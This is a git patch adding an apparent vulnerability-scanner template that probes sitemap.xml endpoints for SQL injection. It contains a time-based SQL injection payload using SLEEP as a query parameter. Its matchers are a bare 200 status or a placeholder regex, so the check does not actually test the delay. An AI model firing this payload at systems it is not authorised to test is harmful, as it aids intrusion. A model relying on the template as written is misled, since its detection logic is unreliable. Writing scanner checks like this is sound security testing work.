From 79ddc770b700450a4abc7ad77cbfcf06812ac80c Mon Sep 17 00:00:00 2001
From: B Aravind <89305482+aravindb26@users.noreply.github.com>
Date: Fri, 9 Jun 2023 17:49:42 +0530
Subject: [PATCH] sitemap-sql

It will be useful to detect sql on the sitemap.xml endpoints or extensions
---
 .../misconfiguration/sitemap-sql-detector.yaml | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100644 http/misconfiguration/sitemap-sql-detector.yaml

diff --git a/http/misconfiguration/sitemap-sql-detector.yaml b/http/misconfiguration/sitemap-sql-detector.yaml
new file mode 100644
index 0000000000..de7957ca73
--- /dev/null
+++ b/http/misconfiguration/sitemap-sql-detector.yaml
@@ -0,0 +1,18 @@
+id: sql-injection
+info:
+  name: SQL Injection
+  author: Aravind
+  severity: high
+  tags: [web, injection, sql]
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)#"
+    matchers-condition: or
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        part: body
+        regex: "Expected response content or regex here"